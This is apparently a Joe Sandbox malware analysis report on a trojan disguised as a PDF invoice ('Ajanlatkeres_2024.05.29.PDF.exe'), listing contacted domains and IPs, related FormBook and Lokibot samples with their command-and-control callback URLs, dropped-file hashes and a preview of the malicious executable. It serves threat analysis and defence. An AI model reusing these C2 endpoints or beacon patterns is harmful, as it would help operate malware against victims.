                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.ioco.inexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.verxop.xyzReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.ResourcesYLc7afPlL4RjCeK.exe, 0000000E.00000000.1314951505.0000000000C55000.00000002.00000001.01000000.0000000C.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, YLc7afPlL4RjCeK.exe.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lovedacademy.com/dn03/www.vivaness.clubexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lovedacademy.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lovedacademy.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sukhiclothing.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          77.105.36.123
                                          mbsngradnja.comSerbia
                                          9125ORIONTELEKOM-ASRSfalse
                                          101.36.116.238
                                          top-dao.com.lo1069.faipod.comChina
                                          135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue
                                          103.224.212.213
                                          www.vivaness.clubAustralia
                                          133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                          45.61.137.215
                                          unknownUnited States
                                          40676AS40676UStrue
                                          104.21.10.127
                                          www.servicepmgtl.worldUnited States
                                          13335CLOUDFLARENETUStrue
                                          34.132.146.171
                                          www.banditsolana.comUnited States
                                          2686ATGS-MMD-ASUStrue
                                          3.33.130.190
                                          sukhiclothing.comUnited States
                                          8987AMAZONEXPANSIONGBtrue
                                          216.40.34.41
                                          www.imdcaam.comCanada
                                          15348TUCOWSCAtrue
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1448989
                                          Start date and time:2024-05-29 15:41:18 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 12m 50s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:29
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:Ajanlatkeres_2024.05.29.PDF.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@20/15@13/8
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 314
                                          • Number of non-executed functions: 85
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • VT rate limit hit for: Ajanlatkeres_2024.05.29.PDF.exe
                                          TimeTypeDescription
                                          09:42:03API Interceptor2x Sleep call for process: Ajanlatkeres_2024.05.29.PDF.exe modified
                                          09:42:05API Interceptor22x Sleep call for process: powershell.exe modified
                                          09:42:07API Interceptor1x Sleep call for process: YLc7afPlL4RjCeK.exe modified
                                          09:42:16API Interceptor69x Sleep call for process: RegSvcs.exe modified
                                          09:42:23API Interceptor7418387x Sleep call for process: explorer.exe modified
                                          09:42:52API Interceptor7045874x Sleep call for process: chkdsk.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          77.105.36.123Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                            103.224.212.213Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
                                            DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
                                            PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                            • searchseedphase.online/bot/regex
                                            PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                            • searchseedphase.online/bot/regex
                                            Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                            • www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
                                            2024-09C33T37.exeGet hashmaliciousFormBookBrowse
                                            • www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
                                            rBCPcomprobante.exeGet hashmaliciousFormBookBrowse
                                            • www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
                                            Proforma_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
                                            003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP
                                            Nuevo_orden_pdf.exeGet hashmaliciousFormBookBrowse
                                            • www.themicheline.com/g11y/?4hOl=Q/yQLYVAGKkMZrnE0iOJNdDJIeKID0+EwORul+wPjaygN5L5fjaaMR6aEX0pRQDKm1/B&l2Mt_N=fTAlQTwhPDH
                                            45.61.137.215PO#34316_20240528.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            DHL Receipt_20458077822.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            SC_TR23052024.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            Purchase Inquiry_#466789.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            FedEx_776282383902.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            hgDQGUqtEg.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/3b1tenbkyj
                                            g1lrdXCX39.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/index?id=671120760852658
                                            gunzipped.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/modify?post=1
                                            FedEx Receipt_AWB# 102235506763.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/t?id=090
                                            DHLAwb#82102199382.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215/index.php/index?id=671120760852658
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mbsngradnja.comErzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                            • 77.105.36.123
                                            parkingpage.namecheap.comMekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 91.195.240.19
                                            Scan Document_doc.exeGet hashmaliciousFormBookBrowse
                                            • 91.195.240.19
                                            SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                                            • 91.195.240.19
                                            product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                            • 91.195.240.19
                                            Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                                            • 91.195.240.19
                                            #U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
                                            • 91.195.240.19
                                            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 91.195.240.19
                                            ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 91.195.240.19
                                            GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                            • 91.195.240.19
                                            waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 91.195.240.19
                                            www.servicepmgtl.world0TGpiP3RIc.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.10.127
                                            www.banditsolana.comErzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                            • 34.132.146.171
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ORIONTELEKOM-ASRSErzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                            • 77.105.36.123
                                            Doc Inv & Packing list 04015032024.exeGet hashmaliciousAgentTeslaBrowse
                                            • 77.105.36.120
                                            4dW63OK85H.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 79.175.73.77
                                            SDWMUDNX8V.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 77.105.36.190
                                            2032473648363.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                            • 77.105.36.190
                                            3182473663947752.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 77.105.36.190
                                            CE1J3nsJim.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 178.254.136.77
                                            vUvgbnhi3T.elfGet hashmaliciousMiraiBrowse
                                            • 79.175.73.97
                                            W58U3lImGU.elfGet hashmaliciousMiraiBrowse
                                            • 79.175.97.219
                                            3ZCVTnKE2z.elfGet hashmaliciousMiraiBrowse
                                            • 79.175.97.41
                                            UHGL-AS-APUCloudHKHoldingsGroupLimitedHKCurriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                            • 152.32.189.143
                                            http://wuyouo.cn/Get hashmaliciousUnknownBrowse
                                            • 23.91.97.62
                                            OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 152.32.189.143
                                            Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                            • 152.32.189.143
                                            https://smmcbybf.com/Get hashmaliciousUnknownBrowse
                                            • 101.36.105.98
                                            JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                            • 103.218.244.205
                                            http://www.globaltimes.cnGet hashmaliciousHTMLPhisherBrowse
                                            • 128.14.246.120
                                            SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exeGet hashmaliciousUnknownBrowse
                                            • 128.14.246.120
                                            SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exeGet hashmaliciousUnknownBrowse
                                            • 128.14.246.120
                                            0ekwLomWKo.exeGet hashmaliciousFormBookBrowse
                                            • 152.32.189.143
                                            TRELLIAN-AS-APTrellianPtyLimitedAUhttp://www.adrus.com/extranet/csxEquipment/EquipmentSpecifications/cs_SpecificationMainPage.htmGet hashmaliciousUnknownBrowse
                                            • 103.224.182.246
                                            Details of Your Etisalat Summary Bill for the Month of May 2024.exeGet hashmaliciousFormBookBrowse
                                            • 103.224.212.212
                                            file.exeGet hashmaliciousCMSBruteBrowse
                                            • 103.224.212.214
                                            HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
                                            • 103.224.212.237
                                            SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                            • 103.224.212.34
                                            Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                            • 103.224.212.214
                                            Swift Copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 103.224.212.217
                                            0rVlyonS3R.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 103.224.182.246
                                            https://upsmychoicedeals.comGet hashmaliciousUnknownBrowse
                                            • 103.224.212.216
                                            xQAP5P41U8DI.exeGet hashmaliciousRemcosBrowse
                                            • 103.224.182.242
                                            AS40676USPO#34316_20240528.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215
                                            skt.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 103.78.120.37
                                            https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
                                            • 182.255.33.134
                                            DHL Receipt_20458077822.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215
                                            SC_TR23052024.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215
                                            Purchase Inquiry_#466789.exeGet hashmaliciousLokibotBrowse
                                            • 45.61.137.215
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 41.216.183.25
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 41.216.183.25
                                            fdftMGtnix.elfGet hashmaliciousUnknownBrowse
                                            • 23.133.14.61
                                            n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                                            • 162.73.212.211
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Windows\explorer.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):1022
                                            Entropy (8bit):5.19752173423261
                                            Encrypted:false
                                            SSDEEP:24:YqHZ6T06Mhmvmelb0O0bihmc5mel6CUXyhmdmelbxdB6hmCmelz0Jahm7melbNdL:YqHZ6T06McuIb0O0biccUIDUXycAIbx3
                                            MD5:B8F1026E2F105E444BC295DDE77C6D16
                                            SHA1:830D4EC90E5AE43B829544F48306DFF9633B0D1A
                                            SHA-256:CA99DE552553F6681A5F4B51FCFC0191BCE4EE8FC930C16FF2B95169E3B22F9A
                                            SHA-512:FD9506754FD7CE466C1B6887C942357FB368E03A6CF0FE81D143B657A86B3454CAF42F8CF2678B62E1FDC5CB93ABEA790AE3DE857F4486B8292DFB59951E7B7F
                                            Malicious:false
                                            Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1276605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1266605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":1256605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1246605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":1236605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1226605664,"LastSwitchedHighPart":31061866,
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):2232
                                            Entropy (8bit):5.379540626579189
                                            Encrypted:false
                                            SSDEEP:48:NlWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:NlLHxvIIwLgZ2KRHWLOug8s
                                            MD5:8AD5AD7ED1691653920E59B2A30B77AC
                                            SHA1:F4D5B6E87F15E39E7FC72BF84DFA0E691707C4FB
                                            SHA-256:1AEA9041E402A3D467074A27374DC8667D43E8F9203CE877C2A43DB08479DFBE
                                            SHA-512:1BC88259E38BEE7A34E5E5B791BA9C52B01D77794C1920A7DE797F3C29AA40E83898E794EF17F8A91A1118621DB9492220043C25BD32EAFDB7A6C1AD7D62087C
                                            Malicious:false
                                            Preview:@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):616448
                                            Entropy (8bit):7.956733647423217
                                            Encrypted:false
                                            SSDEEP:12288:9dJS4VjRSQw4U/S9cG02IDeWnco9Lof/Kg/iHFjALKLPVD3CxDU:tScjRSQwB69cGrIDHnco9G/Kg2JcCtz0
                                            MD5:6F4CDBC9CAC665D375E1F28138E79428
                                            SHA1:2B4DD4CFE4689B48ADE011700F122884DB2F3CDD
                                            SHA-256:0DF2C5B03A9E6D5608464106447DA62E5DBC76FCA6B3C02D96B47B96E08906F9
                                            SHA-512:593B70E38B443732D606560F09E8EDADA2747100DB52B8530A5512BFA38EC98857DDCA9BC680408453B3277CE6810EE286483A21F9D35DFCD43289F0DA639F9B
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 24%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Vf..............0..P...........n... ........@.. ....................................@..................................m..O....................................O..T............................................ ............... ..H............text... N... ...P.................. ..`.rsrc................R..............@..@.reloc...............f..............@..B.................m......H........T...P......&...0...h...........................................~.(.......r...p}.....r...p}....*..{....*"..}....*..{....*"..}....*...0..Q.........}......}.....r...p}.....r...p}.....s....}.....s....}......}.....( ......(.....*..*.0............{....o!.......{....o"....o#...o$......+....o%.... ......,....+....X...o&.........-.........,"..{.....o......{....r...po......++..{.......o'...o......{.......Xo(...o......*....0............{....o!.....{....o"....o#...o$.....{....o.
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
